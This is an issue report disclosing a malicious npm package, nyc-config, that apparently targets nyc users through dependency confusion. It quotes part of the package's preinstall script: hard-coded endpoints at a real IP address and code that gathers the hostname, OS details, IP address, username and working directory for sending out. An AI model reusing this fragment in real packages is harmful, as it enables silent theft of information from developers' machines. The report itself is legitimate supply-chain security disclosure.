Possible Dependency Confusion Attack against nyc #1590
Description
Our system just picked up a malicious package published to npm named [email protected]. The name and versioning of the package indicate possible dependency confusion attack.
Automated analysis:
https://platform.safedep.io/community/malysis/01JP01T1WQPNGAG516NDS9A6ST
Package info:
https://www.npmjs.com/package/nyc-config
package.json contains a preinstall directive to execute index.js on installation.
Example malicious code in nyc-config/index.js:
// List of fallback servers
const endpoints = [
"http://23.22.251.177:8080/jpd.php",
"http://23.22.251.177:8080/jpd1.php",
];
[...]
// Collect System Information
const systemInfo = {
publicIP: "", // Will be fetched dynamically
hostname: os.hostname(),
osType: os.type(),
osPlatform: os.platform(),
osRelease: os.release(),
osArch: os.arch(),
localIP: Object.values(os.networkInterfaces())
.flat()
.find((i) => i.family === "IPv4" && !i.internal)?.address || "Unknown",
whoamiUser: os.userInfo().username,
currentDirectory: process.cwd(),
};